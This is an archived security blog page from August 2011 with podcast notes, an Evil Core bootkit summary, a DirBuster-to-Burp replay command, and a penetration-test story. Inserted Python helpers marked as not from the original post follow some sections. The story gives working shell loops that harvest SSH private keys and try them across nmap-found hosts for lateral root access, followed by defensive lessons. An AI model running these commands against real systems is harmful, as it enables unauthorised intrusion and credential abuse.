August 2011 Archives

Evil Core - Bootkit with Attitude


If you haven't done so already, you need to check out Evil Core. Evil Core is an interesting evolution in bootkit malware. Existing bootkits such as Kon-Boot and Stoned Vienna modify the operating system during the boot process by hooking the BIOS interrupt responsible for reading the OS kernel from disk. The kernel is modified as it is loaded into memory, and the attacker's new evil kernel runs.

Evil Core takes a different approach. First, Evil Core disables Symmetric Multiprocessing (SMP), limiting the number of processor cores available to the operating system. Then, as the operating system boots on the remaining core, it modifies the boot parameters to tell the OS that less memory is available than there actually is. Next, Evil Core places its code at what the OS believes is the end of physical memory, where it can live in peace without any fear of the OS modifying it or even seeing that it exists. Last, Evil Core runs that code, sitting above the OS's view of physical memory, on the unused processor core. This gives the attacker a tremendous amount of flexibility. The malware has full access to all of user and kernel memory space. It is in Ring Zero and it is invisible to the OS! As far as the OS is concerned, it may as well be running on a different computer.

In the demonstration given by Evil Core authors Wolfgang Ettlinger and Stefan Viehboeck, they showed just how powerful that level of access can be. Evil Core can grab the password for a TrueCrypt encrypted volume out of memory. Like Kon-Boot, it can remove the password requirement from the login process. It can hijack the Sticky Keys accessibility function to run custom code, such as a command prompt with SYSTEM privileges. The research is very interesting and I look forward to seeing more as details emerge on this project.

Read more about the project here.

EvilCore Bootkit - pwning multiprocessor systems - demo from Stefan Viehboeck on Vimeo.

Join me for SANS 560 Network Penetration Testing and Ethical Hacking vLive! Class begins September 12, 2011. For a limited time attendees will receive an IPAD2! Register today for a FREE IPAD2!!

Mark Baggett

Whether you're a lover of the must-have suite of Windows tools from Sysinternals, a Windows Azure enthusiast, or a fan of his high tech novel Zero Day, you'll want to tune in Friday night for our interview of the one and only Mark Russinovich!

If you've read his great technical books or appreciated his efforts to combat malware you'll want to view the show live as it was meant to be enjoyed, via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 256 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

PaulDotCom Security Weekly Episode 255 Part 2


Live from the PaulDotCom outdoor studios, Paul, Darren, Ian, and Carlos are joined by "Thor", Martin McKeay, and Josh Corman! What a line-up! We talk passwords, PCI, things most people do wrong when it comes to security, and more!

Episode 255 Show Notes

Episode 255 Part 2 Direct Audio Download

Episode Hosts:

  • Paul Asadoorian

  • Carlos Perez

  • "Intern Ian"

  • Jack Daniel

• Special Guest #1: Martin McKeay (Network Security Podcast)

• Special Guest #2: Josh Corman (From the world of "awesomesauce")
• Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

Audio Feeds:

Video Feeds:

PaulDotCom Security Weekly Episode 255 Part 1

In Part 1 we interview Timothy "Thor" Mullen. As Johnny Long says: "Most recognize Thor as the Norse god of thunder with massive powers of destruction. Few realize that he was also the god of restoration. Likewise, his namesake, Timothy "Thor" Mullen, has spent his entire adult life both destroying and restoring Microsoft-based security systems. Thor's Microsoft Security Bible conveys the wisdom and expertise of the industry legend that has defined the bleeding edge of Microsoft security for over twenty years. I highly recommend this book."

Episode 255 Show Notes

Episode 255 Part 1 Direct Audio Download

Episode Hosts:

• Paul Asadoorian
• Carlos Perez
• "Intern Ian"
• Jack Daniel
• Special Guest #1: Martin McKeay (Network Security Podcast)
• Special Guest #2: Josh Corman (From the world of "awesomesauce")
• Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

Audio Feeds:

Video Feeds:

Don't miss this lineup for Episode 255! We'll have Dr. Timothy "Thor" Mullen on to discuss the recently released Thor's Microsoft Security Bible: A Collection of Practical Security Techniques. Be sure to watch the show live as Tim will be giving away copies of his book!

For Episode 255 we will also have some special guests in-studio: Martin McKeay from the Network Security Podcast and Josh "Zombie Killer" Corman of Rugged Software.

Be sure to watch the show live for your chance to win a copy of the book:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 255 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand, Darren Wigley, and Mike Perez.

Everyone loves Burp Suite. It's the interception proxy of choice for the majority of web app pentesters, and with built-in tools such as Intruder and Repeater, it's a must-have weapon in any web app hacker's arsenal. One of the only weak points in Burp is its inability to thoroughly brute force unlinked web content. Don't get me wrong, Burp Intruder can brute force unknown directories and files, but it doesn't have the ability to recursively brute force and scrape newly discovered content at runtime.

DirBuster, a popular OWASP project, is a long-standing and suitable replacement for this missing functionality in Burp. DirBuster was designed solely for the discovery of unlinked web content and has the ability to recursively brute force directories and file names at runtime and crawl newly found links as they are discovered. It is threaded, which allows for speed/reliability tuning, and written in Java, so it is pretty much platform independent. It comes prepackaged with some decent word lists, but they haven't been updated for about 3 years. However, there are plenty of resources for quality word lists, so this is no big deal. The newly released RAFT project has a few lists which I highly recommend. The downside to DirBuster is a less than user-friendly scan report, which is not conducive to importing results into other tools.

Seeing as DirBuster is my brute forcer of choice, and Burp is my interception proxy of choice, bridging the gap between these 2 tools and getting the output from DirBuster into Burp for further analysis is crucial. As you can see below, one bash command, about 140 characters long, does the trick. It takes the report file from DirBuster and plays it back against your interception proxy, in my case Burp.

cat report.txt | grep '^\/' | grep -v ':' | while read line; do curl -s http://[target of scan]$line --proxy 127.0.0.1:8080 -o /dev/null; done

Here's a breakdown of the command:
1. pass the report file to stdout
2. grep out all of the directory, file, and internal error results (the lines beginning with "/")
3. un-grep all of the internal errors (the lines containing ":")
4. loop through all of the results
5. use curl to craft a web request for each result
6. configure curl to use the proxy
7. dump the curl output to /dev/null to suppress stdout (optional)

All of your DirBuster results are now available for analysis in your interception proxy, and tools like Burp will have passively scanned and spidered the results in the process. There's nothing like some command line kung fu goodness to solve a common problem with such simplicity and elegance. Enjoy!
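Added example (my code, not from the original post): a Python equivalent of the one-liner that parses the DirBuster report with the same filter and replays each path through the proxy, and goes one step further by keeping the HTTP status DirBuster recorded for each path so the replay can be limited to, say, the 200s. The report text and target address are constructed, and the proxy address assumes Burp's default listener of 127.0.0.1:8080.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Constructed sample of a DirBuster text report (not output from a real scan).
SAMPLE_REPORT = """\
DirBuster 1.0-RC1 - Report
Report produced on Sun Aug 07 2011

http://192.0.2.10:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/images/

Dirs found with a 403 response:

/cgi-bin/

--------------------------------
Files found during testing:

Files found with a 200 response:

/index.html
/backup.zip

/broken:Internal error while testing
"""

STATUS_RE = re.compile(r"found with a (\d{3}) respon")  # also matches "responce" in some builds


def parse_report(text):
    """Return [(path, status)] from a DirBuster report.

    Same filter as the one-liner: keep lines starting with "/" and drop any
    containing ":" (DirBuster's internal-error lines). The status comes from
    the most recent "... found with a NNN response:" header, or None.
    """
    results, status = [], None
    for line in text.splitlines():
        m = STATUS_RE.search(line)
        if m:
            status = int(m.group(1))
            continue
        if line.startswith("/") and ":" not in line:
            results.append((line.strip(), status))
    return results


def replay(base_url, findings, proxy="127.0.0.1:8080", timeout=5):
    """Request every path through the proxy so it sees each finding (the curl loop above)."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    sent = 0
    for path, _ in findings:
        try:
            opener.open(urljoin(base_url, path), timeout=timeout).read()
        except urllib.error.URLError:
            pass  # proxy down or target unreachable; carry on with the rest
        sent += 1
    return sent


if __name__ == "__main__":
    findings = parse_report(SAMPLE_REPORT)
    only_200 = [f for f in findings if f[1] == 200]
    print(f"{len(findings)} paths parsed, {len(only_200)} with status 200")
    # replay("http://192.0.2.10/", only_200)  # run with your proxy listening
```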

Look for my SANS 560 Mentor sessions coming to Northwestern Ohio beginning November 2011! In the meantime, join Mark Baggett for SANS 560 Network Penetration Testing and Ethical Hacking vLive! Class begins September 12, 2011. For a limited time attendees will receive an IPAD2! Register today for a FREE IPAD2!!

PaulDotCom Security Weekly Episode 254 Part 2

In Part 2 of this episode we hear from more of the fine folks of Trustwave's SpiderLabs and are amazed by:

Traps of Gold with Andrew Wilson:

Then we attempt to do the drunken stories of the week and reveal the special "adult" guests to our booth at Defcon:

Episode 254 Show Notes

Episode 254 Part 2 Direct Audio Download

Episode Hosts:

• Paul Asadoorian
• Carlos Perez
• Larry Pesce
• John Strand
• "Intern Ian"
• Jack Daniel
• Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

Audio Feeds:

Video Feeds:

PaulDotCom Security Weekly Episode 254 Part 1

In this episode we hear from the fine folks of Trustwave's SpiderLabs. They appear on the show to give three, that's right, three special technical segments on various topics. In Part 1 we are astounded by:

Amazingly True Stories from Real Penetration Tests:

We also hear from our good friend Dan Crowley on cryptographic oracles:

Episode 254 Show Notes

Episode 254 Part 1 Direct Audio Download

Episode Hosts:

• Paul Asadoorian
• Carlos Perez
• Larry Pesce
• John Strand
• "Intern Ian"
• Jack Daniel
• Tune in to Pauldotcom Security Weekly TV episodes on our Bliptv channel.

Audio Feeds:

Video Feeds:

What do you mean privilege escalation is not HIGH RISK?

Sometimes people dismiss privilege escalation exploits and don't give them the same priority as remote exploits. Certain software companies won't even classify privilege escalation as "HIGH PRIORITY". I wanted to share a story about how a single privilege escalation exploit can result in the downfall of an entire network. Doug Burks and I recently teamed up on a penetration test, and a little bash foo turned a single privilege escalation exploit into root on the entire infrastructure.

Our penetration test started with one vulnerability in a web application. Throw in a privilege escalation exploit and we had root access on a box. We grabbed /etc/shadow and gave it to John the Ripper. It just spun for a few hours with no immediate results. There were no easily cracked passwords. But we had root and could pivot, so we decided to move on to another target. Looking around, we found we had a target-rich DMZ environment. There were MANY targets and they were ALL in scope. A vulnerability scan revealed that they were well patched against remote exploitation. The method we used to get a foothold wasn't going to get us onto any of the other hosts in the DMZ. If the passwords aren't cracking, how do we get in? Hmm.... I wonder if anyone left SSH private keys lying around.

$ find /home -name "id_?sa"
/home/user1/.ssh/id_dsa
/home/user2/.ssh/id_rsa
/home/user3/.ssh/id_dsa
...

Awesome!! We found 10 users' SSH private keys lying around. As long as a key isn't passphrase protected, we can use it to log into any SSH server where the corresponding public key has been set up. Now the only problem is knowing which servers are set up to accept which keys.

First let's look at how to check a single host to see which private keys work. We start with the output of our find command above, and for each private key we find we will try to log in to a specific server. To log in to the SSH server with a specific key we can use the following syntax:

ssh -q -o "BatchMode=yes" USERNAME@TargetIP -i /home/username/.ssh/id_dsa

Here is what the parameters mean:

-q                   - Quiet mode, so we don't get error messages
-o "BatchMode=yes"   - Puts SSH into batch mode. As a result, prompts such as "Do you want to add the SSH key to the keystore" and password prompts are disabled. The option seems like it was created for SSH key brute-forcing attacks such as this.
-i                   - The path to the private key to use to log in
USERNAME@TargetIP    - The username to use to log in and the IP of the target host

We can get the associated USERNAME from the path of the private key: it is the subdirectory beneath /home. So let's wrap it in a loop that tries each of the keys against a specific host:

find / -name "id_?sa" | while read FILE; do USERNAME=$(echo $FILE | cut -d/ -f3); ssh -q -o "BatchMode=yes" $USERNAME@x.x.x.x -i $FILE "echo 2>&1" && echo "I can login as $USERNAME"; done

So now if we replace x.x.x.x with a specific IP address we get a nice list of which keys are allowed to log into the target server. Now let's wrap that in a loop to try it against ALL the hosts on the network running SSH. So Doug parsed out some Nmap results to grab the IP addresses of hosts running SSH. The following command grabs just the IP addresses of SSH servers on the subnet:

nmap -n -p22 --open x.y.z.0/24 | grep "Nmap scan report" | awk '{print $5}'

So putting the two together we get this:

nmap -n -p22 --open x.y.z.0/24 | grep "Nmap scan report" | awk '{print $5}' | while read IP; do find / -name "id_?sa" | while read FILE; do USERNAME=$(echo $FILE | cut -d/ -f3); echo "Trying $USERNAME@$IP"; ssh -q -o "BatchMode=yes" $USERNAME@$IP -i $FILE "echo 2>&1" && echo "I can login as $USERNAME on $IP"; done; done

It gave us something like this (truncated output):

Trying user1@x.y.z.8
Trying user2@x.y.z.8
Trying user1@x.y.z.14
Trying user2@x.y.z.14
....
I can login as user8 on x.y.z.31
Trying user1@x.y.z.37

We quickly scanned the whole subnet and found several hosts that we could log in to. Our unpatched privilege escalation exploit turned those simple logins into root access on all those hosts. Root access on those boxes revealed a whole new list of SSH keys to try. The first box we popped gave us 10 keys. Those 10 keys gave us 13 new hosts. Each of those 13 had a new set of keys and a new set of servers. EXPONENTIAL ROOT EXPLOITATION!!! In no time we had root access to a large portion of the servers in the DMZ of the target environment. From there it was trivial to find ONE host that could be used to pivot to the internal network.

Lessons Learned?

1) Protect your SSH keys. Unless the key is being used by an automated service that is incapable of handling a passphrase-protected key, put a passphrase on your SSH key!

2) There was a patch available for the vulnerability in the web server. The customer had a 30 day patch cycle on servers in the DMZ. A 30 day patch cycle may be OK for your internal network. Your DMZs need to be better. Sometimes 30 days isn't fast enough.

3) Make administrators initiate connections from the internal network to each host in the DMZ. Don't allow them to SSH between hosts in the DMZ. Unless you have automated services on two servers in the DMZ that need to communicate over SSH, DMZ servers shouldn't even see SSH on their peers.

4) Don't put compilers, debuggers, or any unnecessary software on your production boxes. We needed that compiler for our privilege escalation attacks. Compile your packages on your development and QA servers and copy them to production. When you minimize the software on the server you minimize the attack surface and make the attacker's job more difficult.
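The find command above only tells you which keys exist; the added script below (my code, not part of the original post) inspects each key's on-disk format to report whether it actually carries a passphrase, so an administrator can verify lesson 1 across /home before an attacker does. It also looks for id_ecdsa and id_ed25519, which the id_?sa pattern misses, and the key contents used in the self-test are constructed, not real keys.

```python
import base64
import glob
import os
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def key_is_encrypted(text):
    """Return True if the private key text is passphrase-protected.

    Handles the formats OpenSSH writes: legacy PEM (a "Proc-Type: 4,ENCRYPTED"
    header when protected), PKCS#8 ("BEGIN ENCRYPTED PRIVATE KEY"), and the
    openssh-key-v1 container, whose first field after the magic is the cipher
    name, "none" when the key is stored in the clear.
    """
    lines = [l.strip() for l in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        raise ValueError("not a PEM-style private key")
    header = lines[0]
    if "ENCRYPTED PRIVATE KEY" in header:        # PKCS#8, always protected
        return True
    if "OPENSSH PRIVATE KEY" in header:          # openssh-key-v1 container
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        (n,) = struct.unpack(">I", blob[off:off + 4])
        cipher = blob[off + 4:off + 4 + n].decode()
        return cipher != "none"
    # Legacy PEM (BEGIN RSA/DSA/EC PRIVATE KEY): protected keys carry a Proc-Type header.
    return any(l.startswith("Proc-Type: 4,ENCRYPTED") for l in lines[1:4])


def audit_keys(home_root="/home"):
    """Yield (path, username, encrypted) for every private key under home_root."""
    for pat in ("id_?sa", "id_ecdsa", "id_ed25519"):
        for path in sorted(glob.glob(os.path.join(home_root, "*", ".ssh", pat))):
            user = os.path.relpath(path, home_root).split(os.sep)[0]
            with open(path, encoding="utf-8", errors="replace") as fh:
                try:
                    enc = key_is_encrypted(fh.read())
                except ValueError:
                    enc = None  # unrecognised format; flag for manual review
            yield path, user, enc


def make_openssh_blob(cipher):
    """Start of an openssh-key-v1 container for self-testing: magic, cipher, kdf only.

    The rest of a real key (kdf options, key material) is omitted because the
    check above never reads that far. Constructed test data, not a usable key.
    """
    body = OPENSSH_MAGIC
    for field in (cipher.encode(), b"none" if cipher == "none" else b"bcrypt"):
        body += struct.pack(">I", len(field)) + field
    b64 = base64.b64encode(body).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed samples (fake key material) used by the self-test.
PEM_CLEAR = "-----BEGIN RSA PRIVATE KEY-----\nMIIEAAAA\n-----END RSA PRIVATE KEY-----\n"
PEM_PROTECTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                 "MIIEAAAA\n-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    for path, user, enc in audit_keys():
        state = {True: "passphrase", False: "NO PASSPHRASE", None: "unknown"}[enc]
        print(f"{user:12} {state:14} {path}")
```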

Join me for SANS 560 Network Penetration Testing and Ethical Hacking vLive! Class begins September 12, 2011. For a limited time attendees will receive an IPAD2! Register today for a FREE IPAD2!!


Here we have a post from Doug Burks (yes, the guy from Security Onion).

How do I find evil on my network?

[photo: Sometimes... it is obvious.]

For the purposes of this example, "evil" could be any text string that would indicate an attack or successful compromise. If you already have an IDS deployed on your network, this is a simple matter of writing an IDS rule to look for "evil". But what if you don't already have an IDS?

Almost every operating system has some form of tcpdump available, so here's one option:

tcpdump -nnAi eth1 -s0 | grep "evil"

What does it all mean?

-nn
This option disables name resolution for IP addresses AND port numbers. Some versions of tcpdump do this with a single "n", but the double "nn" option should work on all of them.

-A
This option prints just the ASCII text (no hex) in the packets. This is useful when looking for strings like "evil".

-i
This option allows you to specify the interface (in this case eth1). eth1 on my Security Onion box at home is connected to a SPAN port that monitors all ingress/egress of my home network. Doesn't everybody do full packet capture at home?

-s0
This option sets the snaplen. Modern versions of tcpdump default to a snaplen of 65535 bytes. However, many people are still using older versions of tcpdump that default to a snaplen of 68 bytes and would therefore not see the entire packet. Setting snaplen to 0 forces tcpdump to capture the entire packet regardless of its size.

grep
Since we have tcpdump output in ASCII, we can easily use the standard grep command to look for interesting text strings. We might want to include some context around the "evil", so we might want to do something like:

grep -C10 "evil"

This will include the 10 lines before "evil" and the 10 lines after.

Another option would be ngrep. Most Linux distros do not have ngrep installed by default. But let's assume that you've installed it on your Linux box or you have a distro such as Security Onion which just so happens to include ngrep by default. Here's the ngrep version of the command:

ngrep -d eth1 -s0 "evil"

Here we use the "-d eth1" option to force ngrep to listen on device eth1 and the "-s0" option to force ngrep to look at the entire packet. ngrep defaults to a snaplen of 65536, so this option isn't strictly needed here, but is included for completeness. After specifying these options, we simply tell ngrep what string to look for.
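As an added example (my code, not from Doug's post), the same string search done over a saved capture in Python, reporting the IPv4 4-tuple for each hit instead of a raw text line so you know which hosts to look at. It reads classic libpcap files such as those written by "tcpdump -s0 -w evil.pcap"; the capture used in the self-test is constructed in memory, not a real one.

```python
import socket
import struct
import sys

LINKTYPE_ETHERNET = 1


def _payload(frame):
    """(src, sport, dst, dport, payload) for an IPv4 TCP/UDP Ethernet frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":  # not IPv4 over Ethernet
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                             # IPv4 header length in bytes
    proto = ip[9]
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    l4 = ip[ihl:]
    if proto == 6 and len(l4) >= 20:                     # TCP: data offset in byte 12
        hdr = (l4[12] >> 4) * 4
    elif proto == 17 and len(l4) >= 8:                   # UDP: fixed 8-byte header
        hdr = 8
    else:
        return None
    sport, dport = struct.unpack("!HH", l4[:4])
    return src, sport, dst, dport, l4[hdr:]


def find_string(pcap_bytes, needle):
    """Return [(pkt_no, src, sport, dst, dport)] for packets whose payload contains needle."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap_bytes[:4])
    if endian is None:
        raise ValueError("not a classic libpcap file (pcapng is not supported)")
    if struct.unpack(endian + "I", pcap_bytes[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    hits, off, n = [], 24, 0
    while off + 16 <= len(pcap_bytes):
        incl_len = struct.unpack(endian + "IIII", pcap_bytes[off:off + 16])[2]
        frame = pcap_bytes[off + 16:off + 16 + incl_len]  # incl_len honours the snaplen
        off += 16 + incl_len
        n += 1
        info = _payload(frame)
        if info and needle in info[4]:
            hits.append((n,) + info[:4])
    return hits


def _frame(src, sport, dst, dport, payload, proto=6):
    """Constructed Ethernet/IPv4/TCP-or-UDP frame for the self-test (checksums left zero)."""
    if proto == 6:
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    else:
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 1, 0, 64, proto, 0,
                     socket.inet_aton(src), socket.inet_aton(dst)) + l4
    return b"\x00" * 12 + b"\x08\x00" + ip               # zero MACs, ethertype IPv4


def build_pcap(frames):
    """Little-endian libpcap container around the given frames (constructed test data)."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(struct.pack("<IIII", 0, 0, len(f), len(f)) + f for f in frames)
    return header + records


# Constructed sample capture: one request, one reply carrying "evil", one UDP packet.
SAMPLE_PCAP = build_pcap([
    _frame("192.0.2.5", 40000, "198.51.100.7", 80, b"GET /index.html HTTP/1.1\r\n"),
    _frame("198.51.100.7", 80, "192.0.2.5", 40000, b"HTTP/1.1 200 OK\r\n\r\nevil was here"),
    _frame("192.0.2.5", 5353, "203.0.113.9", 53, b"\x12\x34evil", proto=17),
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for pkt, src, sport, dst, dport in find_string(data, b"evil"):
        print(f"packet {pkt}: {src}:{sport} -> {dst}:{dport}")
```

Like the grep and ngrep approaches, this matches one packet at a time, so a string split across two TCP segments is missed without stream reassembly.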

If you'd like to learn more about packet analysis, tcpdump, Snort, and intrusion detection in general, Doug Burks is teaching SANS SEC503 in Portland 8/22 - 8/27. We're extending a 10% discount to PaulDotCom listeners. For more information, please click here.

Whether you weren't able to make DefCon or BlackHat or you simply want to relive a little of the mayhem, join us tomorrow night for three spectacular guest technical segments from the one hundred and sixty legged, international-roaming, net-crawling hybrid bug hunter, Trustwave SpiderLabs!

Episode 254 will feature:
- Amazingly True Stories of Real Penetration Tests with Rob Havelt & Wendel Henrique
- Traps of Gold by Andrew Wilson & Michael Brooks
- Speaking with Cryptographic Oracles by Dan Crowley

Don't miss this little taste of Vegas as it was meant to be enjoyed, live, via the link below:

NOTE: The video will play the most recent show up until we are live!

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 254 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, John Strand and Mike Perez.

Top 10 Things I Learned at Blackhat 2011, Defcon 19 and Vegas

Blackhat 2011

1. Pill bottle caps can have wireless connections - This is a really neat use of technology: people who may forget to take their meds can be reminded with visual indications, and doctors can be notified every time you take a pill. However, this obviously brings up grave privacy concerns.
2. [photo] We Love Adobe.
3. I have too many t-shirts - But that doesn't stop me from acquiring more.
4. FOTA (Firmware Over The Air) allows you to update firmware over wireless, so you know, that wireless chip in the cows in the field gets updates. Why don't Linksys routers have this!
5. If you think putting a GPS with a GSM chip in it in your kid's backpack is a good idea, think again. (Zoomback)
6. The Core party rules - Until someone throws sushi at you. I won't name any names (Shack), but that's a waste of good sushi, man! (Good thing I had a towel on me to clean it off.)
7. Femtocell hacking is neat; it allows you to "middle" calls and make people's phones call 1-900 numbers in one neat small package.
8. Vendors will go to great lengths to get attention - I saw zombies, cigar rollers, motorcycles, and very scantily clad ladies.
9. There are good uses for aerial UAVs, like incident response. However, they can be used for evil, but you need some flying skills.
10. [photo]
11. The topless pool's privacy is invaded often.
12. Battery firmware is fun to play around with, and it's creepy when your battery dies in a talk about battery firmware hacking.

[photos] Casa Fuente has great cigars. Pictured left is a Forbidden X Lancero, and on the right is a Fuente Hemingway Masterpiece Maduro.

Defcon 19

1. Don't use the hotel network, ATM machines, elevators, credit card network, fire suppression, kiosks, or basically anything else with a chip in it; they will all be hacked. I might consider a pre-paid credit card next year for Defcon (no, my credit card was not stolen, but it got me thinking).
2. When joining the I-Hacked guys to every Defcon party in one night, wear comfortable shoes and have your "drinking big boy pants" on.
3. Bring a sweatshirt to wear in the vendor area.
4. No one likes pink hats, not even women.
5. You can never pack too many socks; however, wearing funky socks is really fun.
6. [photos]
7. Trustwave SpiderLabs and IOActive throw awesome parties, and the bathroom can be the place to be!
8. Twitchy lives.
9. [photo] Images have been obscured to protect the innocent (and the guilty).
10. Simple Nomad looks great in pink.
11. [photo]
12. We love listeners that give us gifts and return the favor.
13. [photo]
14. Larry loves getting his yearly mohawk, and only when we are together are we "1337".
15. [photos]

Top Ten Reasons You Know You've Been In Vegas Too Long

1. Nosebleeds.
2. You don't even hear the "slot machine noise" anymore (ding, ling, la ling, ding ding).
3. Vegas Throat - It's a scratchy, irritating, dry, "I've been breathing too much Vegas" kind of feeling that is often accompanied by pain and loss of voice.
4. When you get home and pay $20 for lunch, you think, "Wow, that's such a bargain!"
5. Walking 5 miles to the store when you get home is a short trip.
6. You walk outside when it's 107F and say, "It's not that hot."
7. You start to wonder if the older nice lady serving you breakfast was once the go-go dancer at the club 30 years ago.
8. The big topic of conversation over dinner is whether or not the dancers at the Shadow Bar are really naked.
9. You are worried that your wife will notice that $300 withdrawal from the ATM at 1AM, and the other for $200 at 3AM.
10. You think it's totally normal for women to be dressed in G-strings.

PaulDotCom Security Weekly Episode 253 Part 2

Paul, Larry, Jack, and Nick Selby talk about the stories of the week, including hacking cars, mod_security challenge results, router pwn web sites, and drug smuggling.

Episode 253 Show Notes

Episode 253 Part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Jack Daniel, Larry Pesce

Audio Feeds: